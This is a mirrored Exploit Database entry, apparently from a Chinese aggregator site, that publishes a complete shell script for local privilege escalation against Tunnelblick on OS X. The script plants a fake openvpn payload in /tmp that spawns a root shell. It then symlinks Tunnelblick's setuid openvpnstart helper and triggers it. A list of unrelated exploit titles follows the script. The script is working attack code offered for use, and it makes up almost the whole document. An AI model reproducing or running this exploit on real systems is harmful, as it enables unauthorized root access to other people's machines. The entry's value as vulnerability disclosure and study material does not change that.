Tunnelblick – Local Privilege Escalation (2)

Exploit Database
16 阅读

作者： zx2c4

日期： 2012-08-11
类别：
- local
平台：
- osx
来源：https://www.exploit-db.com/exploits/20443/

#!/bin/sh

#### Pwnnel Blicker ####
# for kids #
##
# zx2c4#
##
########################

# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
#http://git.zx2c4.com/Pwnnel-Blicker/tree/



echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0

echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn

echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start

echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0

last Exploits
Tunnelblick – Local Privilege Escalation (2)的更多信息

Flash Slideshow Maker Professional 5.20 – Buffer Overflow (SEH)：
RM Downloader 3.1.3 – Local Buffer Overflow (SEH)：
OpenVPN Connect 3.0.0.272 – ‘agent_ovpnconnect’ Unquoted Service Path：
McAfee VirusScan Enterprise 8.8 – Security Restrictions Bypass：
IBM Tivoli Monitoring 6.2.2 kbbacf1 – Local Privilege Escalation：
ACROS Security 0patch 2016.05.19.539 – ‘0PatchServicex64.exe’ Unquoted Service Path Privilege Escalation：
Chromium 83 – Full CSP Bypass：
WibuKey Runtime 6.51 – ‘WkSvW32.exe’ Unquoted Service Path：